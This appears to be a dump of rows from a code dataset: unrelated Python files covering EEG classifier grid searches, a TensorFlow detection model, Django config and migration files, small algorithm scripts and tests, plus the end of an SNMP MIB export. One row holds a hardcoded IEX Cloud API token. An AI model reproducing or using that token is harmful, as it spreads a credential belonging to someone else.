mscAtmIfVccEbrInfoOptimizationSubscribed=mscAtmIfVccEbrInfoOptimizationSubscribed, mscAtmIfVptVccSrcEbrOvRowStatusTable=mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB, mscAtmIfVptVccEbrInfoRecoverySubscribed=mscAtmIfVptVccEbrInfoRecoverySubscribed, mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry, mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus, mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry, mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType, mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry, mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable, mscAtmIfIispEbrIneligibleRecoveredConnections=mscAtmIfIispEbrIneligibleRecoveredConnections, mscAtmIfVptIispEbrConnectionRecovery=mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02, mscAtmIfVptIispEbrTotalConnectionRecoveries=mscAtmIfVptIispEbrTotalConnectionRecoveries, mscAtmIfUniEbrTotalPathOptimizations=mscAtmIfUniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvRecoverySubscribed=mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=mscAtmIfVptPnniEbrOperTable, mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=mscAtmIfVptVccSrcEbrOvOptimizationSubscribed, mscAtmIfVptUniEbrEligibleRecoveredConnections=mscAtmIfVptUniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoOptimizationSubscribed=mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=mscAtmIfVptVccSrcEbrOvStorageType, mscAtmIfVptPnniEbrTotalPathOptimizations=mscAtmIfVptPnniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName, mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName, mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry, mscAtmIfVptVccSrcEbrOvRecoverySubscribed=mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA, mscAtmIfVccEbrInfoTotalConnectionRecoveries=mscAtmIfVccEbrInfoTotalConnectionRecoveries)
|
4,890 | 0754103c2d8cef0fd23b03a8f64ade8f049bce48 | from django.apps import AppConfig
class GerenciaLedsConfig(AppConfig):
name = 'gerencia_leds'
|
4,891 | 86849d0e63cdb93a16497ca56ff9c64c15a60fa7 | IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6' |
4,892 | d8e8ecbf77828e875082abf8dcbfbc2c29564e20 | #!/usr/bin/env python
# -*- coding: utf-8 -*
#Perso
from signalManipulation import *
from manipulateData import *
#Module
import pickle
from sklearn import svm, grid_search
from sklearn.linear_model import ElasticNetCV, ElasticNet, RidgeClassifier
from sklearn.metrics import confusion_matrix, f1_score, accuracy_score, roc_auc_score
from sklearn.preprocessing import scale
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import Pipeline
from sklearn.cross_validation import StratifiedKFold
from copy import copy,deepcopy
import pylab as pl
#======================== TOOLS ========================
#======================================================
def writeResults(results, best_params, best_score, modelType, penalty, scoreType,\
transformedData, scores=None):
"""
Write results of a grid_search in a file
[parameters] [score] [STD]
...
[Confusion Matrix of the best model on train]
[Confusion Matrix of the best model on test]
Best Params : XXXX Score CV : XXX%
Accuracy Train : XX Accuracy Test : XX
F1 Train : XX F1 Test : XX
Ex :
1.3 0.91
1.7 0.65
[[9787 4]
[ 399 520]]
[[6690 276]
[ 598 30]]
Best Params : 1.3 Score CV : 0.91
Accuracy Train : 0.91 Accuracy Test : 0.80
F1 Train : 0.80 F1 Test : 0.50
"""
strScores = ""
if modelType=='NonLinear':
for model in results:
print(model)
strScores += "{:.4} {} {} {}\n".format(model[0]['C'], model[0]['gamma'], model[1], np.std(model[2]))
elif modelType=='ElasticNet':
for model in results:
print(model)
strScores += "{:.4} {} {} {}\n".format(model[0]['alpha'], model[0]['l1_ratio'], model[1], np.std(model[2]))
elif modelType=='Pipe':
for model in results:
print(model)
if 'classif__C' in model[0].keys():
strScores += "{} {:.4} {} {}\n".format(model[0]['csp__n_components'], model[0]['classif__C'], model[1], np.std(model[2]))
else:
strScores += "{} {:.4} {} {}\n".format(model[0]['csp__n_components'], model[0]['classif__alpha'], model[1], np.std(model[2]))
elif modelType=='Ridge':
for model in results:
print(model)
strScores += "{:.4} {} {}\n".format(model[0]['alpha'], model[1], np.std(model[2]))
else: #Linear, C is the only parameter
for model in results:
print(model)
strScores += "{:.4} {} {}\n".format(model[0]['C'], model[1], np.std(model[2]))
strScores += "Best Params : {} Score CrossVal : {} \n".format(best_params, best_score)
if scores:
strScores += "{}\n{}\n".format(str(scores['cMatrixTrain']),\
str(scores['cMatrixTest']))
strScores += "Accuracy Train : {} Accuracy Test : {} \n".format(scores['accTrain'], scores['accTest'])
strScores += "F1 Train : {} F1 Test : {} \n".format(scores['f1Train'],\
scores['f1Test'])
strScores += "Roc_Auc Train : {} Roc_Auc Test : {} \n".format(scores['rocTrain'],scores['rocTest'])
else:
print("No Test file")
strScores += "\nNo Test file\n=========\n"
f = open("{}{}HyperSelection{}{}{}.txt".format(RESULTS_PATH, penalty, modelType.title(), scoreType.title(), transformedData.title()), 'w')
f.write(strScores)
f.close()
def getScores(y, yPredTrain, yTest, yPredTest):
scores = dict()
scores['f1Train'] = f1_score(y, yPredTrain)
scores['f1Test'] = f1_score(yTest, yPredTest)
scores['accTrain'] = accuracy_score(y, yPredTrain)
scores['accTest'] = accuracy_score(yTest, yPredTest)
scores['rocTrain'] = roc_auc_score(y, yPredTrain)
scores['rocTest'] = roc_auc_score(yTest, yPredTest)
scores['cMatrixTrain'] = confusion_matrix(y, yPredTrain)
scores['cMatrixTest'] = confusion_matrix(yTest, yPredTest)
proba = float(len(np.where(y==1)[0]))/len(y)
if proba < 0.50:
proba = 1 - proba
scores['random'] = proba
return scores
def printScores(scores):
strSave = "Train :\n"
strSave += "Accuracy : {}\n".format(scores['accTrain'])
strSave += "Roc_Auc : {}\n".format(scores['rocTrain'])
strSave += "F1 : {}\n".format(scores['f1Train'])
strSave += "{}\n".format(scores['cMatrixTrain'])
strSave += "Test :\n"
strSave += "Accuracy : {}\n".format(scores['accTest'])
strSave += "Roc_Auc : {}\n".format(scores['rocTest'])
strSave += "F1 : {}\n".format(scores['f1Test'])
strSave += "{}\n".format(scores['cMatrixTest'])
strSave += "Random Accuracy : {}".format(scores['random'])
print strSave
return strSave
def testModel(best,X,y,xTest,yTest,penalty):
print("Predicting Data :")
yPredTrain = best.predict(X)
yPredTest = best.predict(xTest)
scores = getScores(y, yPredTrain, yTest, yPredTest)
printScores(scores)
if penalty=='l1':
saveNonZerosCoef(best, 'l1', dataType=transformedData)
analyzeCoef(dataType=transformedData, reg='l1')
return scores
def saveNonZerosCoef(clf, reg, dataType):
nonZerosParams = np.where(clf.coef_ != 0)[0]
print("Nombre de coef : ", len(clf.coef_[0]))
print("Nombre de coef annulés : ", len(nonZerosParams))
with open('nonZerosParams{}{}'.format(dataType.title(),reg), 'w') as f:
f.write(str(list(nonZerosParams)))
analyzeCoef(dataType, reg)
def analyzeCoef(dataType, reg):
path = "Images/Screenshots/"
with open('nonZerosParams{}{}'.format(dataType.title(),reg), 'r') as f:
wholeFile = f.read()
print("Here")
print(wholeFile[0], wholeFile[-1])
wholeFile = wholeFile[1:-1]
numGen = map(int,wholeFile.split(','))
#Step
step = np.zeros(40)
steps = np.array([i+1 for i in range(40)])
for num in numGen:
step[num%40] += 1
numGen = map(int,wholeFile.split(','))
#Elec
elec = np.zeros(64)
elecs = np.array([i+1 for i in range(64)])
for num in numGen:
elec[num//40] += 1
ax = plt.subplot()
steps = np.array(steps)/60
ax.bar(steps, step, width=1/60)
ax.set_title("Nombre de coefficients non annulés par pas de temps")
plt.savefig(path+'nonZerosStep{}{}.png'.format(dataType.title(),reg))
plt.show()
ax = plt.subplot()
ax.bar(elecs, elec, width=1)
ax.set_title("Nombre de coefficients non annulés par electrode")
plt.savefig(path+'nonZerosElec{}{}.png'.format(dataType.title(),reg))
plt.show()
#=============== Learner =============================
#====================================================
def learnHyperLinear(X, y, xTest, yTest, penalty, scoring, transformedData,jobs=1):
"""
Grid Search over a set of parameters for linear model
"""
#Check if test is empty, if it is, don't refit and predict data
testAvailable = np.size(xTest,0)!=0
# Parameters selection
#====================
cRange = np.logspace(-5,1,3)
parameters = {'C': cRange}
if penalty=='l1':
dual=False
else:
dual=True
#Creating Model and begin classification
#=======================================
classif = svm.LinearSVC(penalty=penalty, class_weight=CLASS_WEIGHT, dual=dual)
clf = grid_search.GridSearchCV(classif, parameters, scoring=scoring, cv=5, n_jobs=jobs, verbose=3, refit=testAvailable)
print("Begin\n...")
clf.fit(X,y)
#Get results, print and write them into a file
#============================================
print(clf.best_params_, clf.best_score_)
if testAvailable:
scores = testModel(clf.best_estimator_,X,y,xTest,yTest,penalty)
writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,'Linear',\
penalty,scoring, transformedData, scores=scores)
else:
print("No test, don't predict data")
writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,'Linear',\
penalty,scoring, transformedData, scores=None)
def learnHyperNonLinear(X, y, xTest, yTest, scoring, transformedData,jobs=1):
"""
Grid Search over a set of parameters for a non-linear model
"""
#Check if test is empty, if it is, don't refit and predict data
testAvailable = np.size(xTest,0)!=0
# Parameters selection
#====================
cRange = np.logspace(-5,2,8)
gRange = np.logspace(-5,2,8)
parameters = {'C': cRange, 'gamma':gRange}
#Creating Model and begin classification
#=======================================
classif = svm.SVC(class_weight=CLASS_WEIGHT)
clf = grid_search.GridSearchCV(classif, parameters, scoring=scoring, cv=5, n_jobs=jobs,verbose=3,refit=testAvailable)
print("Begin\n...")
clf.fit(X,y)
#Get results, print and write them into a file
#============================================
print(clf.best_params_, clf.best_score_)
if testAvailable:
scores = testModel(clf.best_estimator_,X,y,xTest,yTest,'l2')
writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,\
'NonLinear', 'l2', scoring, transformedData, scores=scores)
else:
print("No test, don't predict data")
writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,\
'NonLinear', 'l2', scoring, transformedData, scores=None)
def learnRidge(X,y,xTest,yTest,scoring, transformedData, jobs):
"""
Grid Search over a set of parameters for linear model
"""
#Check if test is empty, if it is, don't refit and predict data
testAvailable = np.size(xTest,0)!=0
# Parameters selection
#====================
alpha = np.logspace(-3,3,6)
parameters = {'alpha': alpha}
#Creating Model and begin classification
#=======================================
classif = RidgeClassifier(class_weight=CLASS_WEIGHT)
clf = grid_search.GridSearchCV(classif, parameters, scoring=scoring, cv=10, n_jobs=jobs, verbose=3, refit=testAvailable)
print("Begin\n...")
clf.fit(X,y)
#Get results, print and write them into a file
#============================================
print(clf.best_params_, clf.best_score_)
if testAvailable:
scores = testModel(clf.best_estimator_,X,y,xTest,yTest,'l2')
writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,'Ridge',\
'l2',scoring, transformedData, scores=scores)
else:
print("No test, don't predict data")
writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,'Ridge',\
'l2',scoring, transformedData, scores=None)
def learnRandomForest(X,y,xTest,yTest,scoring, jobs):
params = {
'n_estimators':[2,10,100],
'max_features':['auto',2,10],
'max_depth':[10,40,2],
'min_samples_split':[2,10,20,50]
}
forest = RandomForestClassifier()
grd = grid_search.GridSearchCV(forest,params, scoring=scoring,cv=3,n_jobs=jobs,verbose=3)
grd.fit(X,y)
yPredTrain = grd.predict(X)
yPredTest = grd.predict(xTest)
print "FOREST : \n"
scores = getScores(y, yPredTrain, yTest, yPredTest)
printScores(scores)
def learnCspPipeline(X, y, xTest, yTest, scoring,transformedData,jobs=1, classifier='lin'):
testAvailable = np.size(xTest)
X = vecToMat(X)
if testAvailable:
xTest = vecToMat(xTest)
if classifier=='lin':
classif = svm.LinearSVC(penalty='l2',class_weight=CLASS_WEIGHT)
params = np.logspace(-5,1,3)
hyper = 'classif__C'
else:
classif = RidgeClassifier(class_weight=CLASS_WEIGHT)
params = np.logspace(-1,3,10)
hyper = 'classif__alpha'
csp = CSP(reg='ledoit_wolf',log=False)
scaler = StandardScaler()
pipe = Pipeline(steps = [('csp',csp), ('scaler',scaler), ('classif',classif)])
pipe = Pipeline(steps = [('csp',csp), ('classif',classif)])
n_components = [1,2,5,10,20,30,40,50]
dico = {'csp__n_components':n_components, hyper:params}
grd = grid_search.GridSearchCV(pipe,dico, cv=5, verbose=3, n_jobs=4)
grd.fit(X,y)
if testAvailable:
scores = testModel(grd.best_estimator_,X,y,xTest,yTest,'l2')
writeResults(grd.grid_scores_, grd.best_params_, grd.best_score_,'Pipe', 'l2', scoring, transformedData, scores=scores)
else:
print("No test, don't predict data")
writeResults(grd.grid_scores_, grd.best_params_, grd.best_score_,'Pipe', 'l2', scoring, transformedData, scores=None)
def learnElasticNet(X,y,xTest,yTest,scoring,transformedData='raw',jobs=1):
# Parameters selection
#====================
alpha = np.linspace(0.01,0.2,5)
l1_ratio = np.linspace(0.01,0.3,5)
parameters = {'alpha': alpha, 'l1_ratio': l1_ratio}
#Creating Model and begin classification
#=======================================
classif = ElasticNet(selection='random')
clf = grid_search.GridSearchCV(classif, parameters, scoring=scoring, cv=5, n_jobs=jobs,verbose=3)
print("Begin\n...")
clf.fit(X,y)
#Get results, print and write them into a file
#============================================
best = clf.best_estimator_
print(clf.best_params_, clf.best_score_)
if np.size(a,0)!=0:
print("Predicting Data :")
yPredTrain = best.predict(X)
yPredTrain[yPredTrain >= 0] = 1
yPredTrain[yPredTrain < 0] = -1
yPredTest = best.predict(xTest)
yPredTest[yPredTest >= 0] = 1
yPredTest[yPredTest < 0] = -1
scores = getScores(y, yPredTrain, yTest, yPredTest)
printScores(scores)
writeResults(clf.grid_scores_, clf.best_params_, clf.best_score_,\
'ElasticNet', 'l1l2', scoring, transformedData, scores)
nonZerosParams = np.where(best.coef_ != 0)[0]
print(len(nonZerosParams))
print(nonZerosParams)
with open('nonZerosParamsRawElasticNet', 'w') as f:
f.write(str(list(nonZerosParams)))
def learnStep(X, y, xTest, yTest, penalty, scoring, transformedData,jobs=1):
baseClf = svm.LinearSVC(penalty='l2', class_weight=CLASS_WEIGHT)
cRange = [1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1, 10]
parameters = {'C': cRange}
best_score = 0
numStep = np.size(X,1)//64
keptStep = np.ones(numStep, dtype=bool)
copyX = copy(X)
copyXTest = copy(xTest)
scores = np.zeros(numStep)
scoreDecrease = False
numFailed = 0
while not scoreDecrease:
scores[:] = 0
for step in range(numStep):
if not keptStep[step] :
continue
else:
erased = list(np.where(keptStep==False)[0])
if erased != []:
erased.append(step)
X = delTimeStep(X, erased, transformedData)
xTest = delTimeStep(xTest, erased, transformedData)
else:
X = delTimeStep(X,step, transformedData)
xTest = delTimeStep(xTest, step, transformedData)
print("Learning Model without step N°",step)
clf = grid_search.GridSearchCV(baseClf, parameters, scoring=scoring,\
cv=5, n_jobs=jobs, verbose=3)
clf.fit(X,y)
best = clf.best_estimator_
print(clf.best_params_, clf.best_score_)
yPredTest = best.predict(xTest)
if scoring=='f1':
scores[step] = f1_score(yTest, yPredTest)
else:
scores[step] = roc_auc_score(yTest, yPredTest)
print("Score :", scores[step])
#post process :
X = copy(copyX)
xTest = copy(copyXTest)
worstStep = np.argmax(scores)
keptStep[worstStep] = False
print("Score max : {}, removing step N°{}".format(scores[worstStep], worstStep))
print("Step removed : ", np.where(keptStep==False))
print("Past Best : ", best_score)
if scores[worstStep] > best_score:
best_score = scores[worstStep]
else:
numFailed += 1
if numFailed > 3:
scoreDecrease = True
def learnElecFaster(X, y, xTest, yTest, penalty, scoring, transformedData,jobs=1):
baseClf = svm.LinearSVC(penalty='l2', class_weight=CLASS_WEIGHT)
cRange = np.logspace(-5,2,8)
parameters = {'C': cRange}
if np.size(xTest)!=0:
X = np.concatenate((X,xTest))
y = np.concatenate((y,yTest))
# clf = grid_search.GridSearchCV(baseClf, parameters, scoring=scoring, cv=5, n_jobs=jobs, verbose=3)
# clf.fit(X,y)
# bestParams = clf.best_params_
# print(bestParams['C'], clf.best_score_)
# C = bestParams['C']
C = 1e-5
baseClf = svm.LinearSVC(penalty='l2', class_weight=CLASS_WEIGHT)
best_score = 0
best_selection = []
keptElec = np.ones(64, dtype=bool)
copyX = copy(X)
scores = np.zeros(64)
scoreDecrease = False
numFailed = 0
for numIter in range(63):
scores[:] = 0
for elec in range(64):
if not keptElec[elec] :
#Already deleted
continue
else:
print("Deleting Electrode(s) ...")
erased = list(np.where(keptElec==False)[0])
if erased != []:
erased.append(elec)
X = delElec(X, erased, transformedData)
else:
X = delElec(X,elec, transformedData)
print("Learning Model without elec N°",elec)
clf = grid_search.GridSearchCV(baseClf, {'C':[C]}, scoring=scoring, cv=10, n_jobs=jobs, verbose=1)
clf.fit(X,y)
scores[elec] = clf.best_score_
print(scores[elec])
#post process :
X = copy(copyX)
worstElec = np.argmax(scores)
keptElec[worstElec] = False
removedElec = np.where(keptElec==False)
print("Score max : {}, removing elec N°{}".format(scores[worstElec], worstElec))
print("Elec removed : ", removedElec)
print("Past Best : ", best_score, "with : ", best_selection)
if scores[worstElec] > best_score:
best_score = scores[worstElec]
best_selection = np.where(keptElec==False)
else:
numFailed += 1
with open("selecStep.txt",'a') as f:
f.write("{} : {} with elec {}, numFailed : {}\n".format(numIter, scores[worstElec], removedElec, numFailed))
|
4,893 | b4783540224902b10088edbd038d6d664934a237 | def findFirst(arr,l,h,x):
if l>h:
return -1
mid=(l+h)//2
if arr[mid]==x:
return mid
elif arr[mid]>x:
return findFirst(arr,l,mid-1,x)
return findFirst(arr,mid+1,h,x)
def indexes(arr, x):
n=len(arr)
ind=findFirst(arr,0,n-1,x)
if ind==-1:
return [-1,-1]
l=u=ind
for i in range(ind+1,n):
if arr[i]==x:
u=i
else:
break
for i in range(ind-1,-1,-1):
if arr[i]==x:
l=i
else:
break
return [l,u]
print(indexes([1,2,5,5,5,5,5,12,45,67],5)) |
4,894 | 17f91b612fad14200d2911e2cb14e740b239f9ff | #!/usr/bin/python3
def divisible_by_2(my_list=[]):
if my_list is None or len(my_list) == 0:
return None
new = []
for num in my_list:
if num % 2 == 0:
new.append(True)
else:
new.append(False)
return new
|
4,895 | 6e17fef4507c72190a77976e4a8b2f56880f2d6f | import tensorflow as tf
import bbox_lib
def hard_negative_loss_mining(c_loss, negative_mask, k):
"""Hard negative mining in classification loss."""
# make sure at least one negative example
k = tf.maximum(k, 1)
# make sure at most all negative.
k = tf.minimum(k, c_loss.shape[-1])
neg_c_loss = c_loss * negative_mask
neg_c_loss = tf.nn.top_k(neg_c_loss, k)[0]
return tf.reduce_sum(neg_c_loss)
def compute_loss(network_output, bboxes, labels, num_classes, c_weight, r_weight,
neg_label_value, ignore_label_value, negative_ratio):
"""Compute loss function."""
with tf.variable_scope("losses"):
batch_size = bboxes.shape[0].value
one_hot_labels = tf.one_hot(labels + 1, num_classes + 1)
negative_mask = tf.cast(tf.equal(labels, neg_label_value), tf.float32)
positive_mask = tf.cast(tf.logical_and(tf.not_equal(labels, ignore_label_value),
tf.not_equal(labels, neg_label_value)), tf.float32)
with tf.variable_scope("classification_loss"):
classification_output = network_output[0]
classification_output = tf.reshape(
classification_output, [batch_size, -1, num_classes + 1])
c_loss = tf.losses.softmax_cross_entropy(
one_hot_labels, classification_output, reduction=tf.losses.Reduction.NONE)
num_positive = tf.cast(tf.reduce_sum(positive_mask), tf.int32)
pos_c_loss = tf.reduce_sum(c_loss * positive_mask)
neg_c_loss = hard_negative_loss_mining(c_loss, negative_mask,
num_positive * negative_ratio)
c_loss = (pos_c_loss + neg_c_loss) / batch_size
with tf.variable_scope("regression_loss"):
regression_output = network_output[1]
regression_output = tf.reshape(
regression_output, [batch_size, -1, 4])
r_loss = tf.losses.huber_loss(regression_output, bboxes, delta=1,
reduction=tf.losses.Reduction.NONE)
r_loss = tf.reduce_sum(
r_loss * positive_mask[..., tf.newaxis]) / batch_size
return c_weight * c_loss + r_weight * r_loss, c_loss, r_loss
def predict(network_output, mask, score_threshold, neg_label_value, anchors,
max_prediction, num_classes):
"""Decode predictions from the neural network."""
classification_output = network_output[0]
batch_size, _, _, output_dim = classification_output.get_shape().as_list()
regression_output = network_output[1]
bbox_list = []
label_list = []
ay, ax, ah, aw = bbox_lib.get_center_coordinates_and_sizes(anchors)
anchor_center_index = tf.cast(tf.transpose(tf.stack([ay, ax])), tf.int32)
for single_classification_output, single_regression_output, single_mask in zip(
classification_output, regression_output, mask):
# num_classes + 1 due to the negative class.
single_classification_output = tf.reshape(
single_classification_output, [-1, num_classes + 1])
single_classification_output = tf.nn.softmax(
single_classification_output, -1)
max_confidence = tf.reduce_max(single_classification_output, -1)
confident_mask = max_confidence > score_threshold
# - 1 due to the negative class.
max_index = tf.argmax(single_classification_output, 1) - 1
non_negative_mask = tf.not_equal(max_index, -1)
in_mask = tf.gather_nd(single_mask, anchor_center_index)
foreground_mask = tf.logical_and(
in_mask, tf.logical_and(confident_mask, non_negative_mask))
valid_labels = tf.boolean_mask(max_index, foreground_mask)
single_regression_output = tf.reshape(single_regression_output, [-1, 4])
predicted_bbox = bbox_lib.decode_box_with_anchor(
single_regression_output, anchors)
valid_boxes = tf.boolean_mask(predicted_bbox, foreground_mask)
valid_confidence_score = tf.boolean_mask(
max_confidence, foreground_mask)
selected_indices = tf.image.non_max_suppression(
valid_boxes, valid_confidence_score, max_prediction)
valid_boxes = tf.gather(valid_boxes, selected_indices)
valid_labels = tf.gather(valid_labels, selected_indices)
bbox_list.append(valid_boxes)
label_list.append(valid_labels)
return bbox_list, label_list
def build_model(num_classes, anchor_num_per_output):
base_network_model = tf.keras.applications.resnet50.ResNet50(
include_top=False, weights="imagenet")
for layer in base_network_model.layers:
layer.trainable = False
h = base_network_model.get_layer(name='activation_39').output
drop_rate = 0.5
h = tf.keras.layers.Dropout(drop_rate)(h)
classification_branch = tf.keras.layers.Conv2D(
(num_classes + 1) * anchor_num_per_output, (1, 1))(h)
regression_branch = tf.keras.layers.Conv2D(
4 * anchor_num_per_output, (1, 1))(h)
model_outputs = [classification_branch, regression_branch]
return tf.keras.models.Model(base_network_model.input, model_outputs)
|
4,896 | ccd32a6ca98c205a6f5d4936288392251522db29 | # -*- coding: utf-8 -*-
__all__ = ["kepler", "quad_solution_vector", "contact_points"]
import numpy as np
from .. import driver
def kepler(mean_anomaly, eccentricity):
mean_anomaly = np.ascontiguousarray(mean_anomaly, dtype=np.float64)
eccentricity = np.ascontiguousarray(eccentricity, dtype=np.float64)
sinf = np.empty_like(mean_anomaly)
cosf = np.empty_like(mean_anomaly)
driver.solve_kepler(mean_anomaly, eccentricity, sinf, cosf)
return sinf, cosf
def quad_solution_vector(b, r):
b = np.ascontiguousarray(b, dtype=np.float64)
r = np.ascontiguousarray(r, dtype=np.float64)
s = np.empty(r.shape + (3,), dtype=np.float64)
driver.quad_solution_vector(b, r, s)
return s
def contact_points(a, e, cosw, sinw, cosi, sini, L):
a = np.ascontiguousarray(a, dtype=np.float64)
e = np.ascontiguousarray(e, dtype=np.float64)
cosw = np.ascontiguousarray(cosw, dtype=np.float64)
sinw = np.ascontiguousarray(sinw, dtype=np.float64)
cosi = np.ascontiguousarray(cosi, dtype=np.float64)
sini = np.ascontiguousarray(sini, dtype=np.float64)
L = np.ascontiguousarray(L, dtype=np.float64)
M_left = np.empty_like(a)
M_right = np.empty_like(a)
flag = np.empty_like(a, dtype=np.int32)
driver.contact_points(
a, e, cosw, sinw, cosi, sini, L, M_left, M_right, flag
)
return M_left, M_right, flag
|
4,897 | 9af71eaf8f6f4daacdc1def7b8c5b29e6bac6b46 | # Generated by Django 2.2.6 on 2019-12-08 22:18
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('backend', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='company',
name='coordinates',
field=django.contrib.gis.db.models.fields.PointField(blank=True, null=True, srid=4326),
),
migrations.AlterField(
model_name='company',
name='founded_at',
field=models.IntegerField(),
),
]
|
4,898 | 6c426d2b165e01a7cec9f7ddbd96113ae05668f6 | import math
n, m, a = map(int, input().split())
top = math.ceil(n/a)
bottom = math.ceil(m/a)
print(top*bottom)
|
4,899 | f4df7688ed927e1788ada0ef11f528eab5a52282 | import pytest
from mine.models import Application
class TestApplication:
"""Unit tests for the application class."""
app1 = Application("iTunes")
app1.versions.mac = "iTunes.app"
app2 = Application("HipChat")
app3 = Application("Sublime Text")
app3.versions.linux = "sublime_text"
app4 = Application("hipchat")
str_application = [
("iTunes", app1),
("HipChat", app2),
("Sublime Text", app3),
("hipchat", app4),
]
@pytest.mark.parametrize("string,application", str_application)
def test_str(self, string, application):
"""Verify applications can be converted to strings."""
assert string == str(application)
def test_eq(self):
"""Verify applications can be equated."""
assert self.app2 == self.app4
assert self.app1 != self.app3
def test_lt(self):
"""Verify applications can be sorted."""
assert self.app2 < self.app1
assert self.app3 > self.app2
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.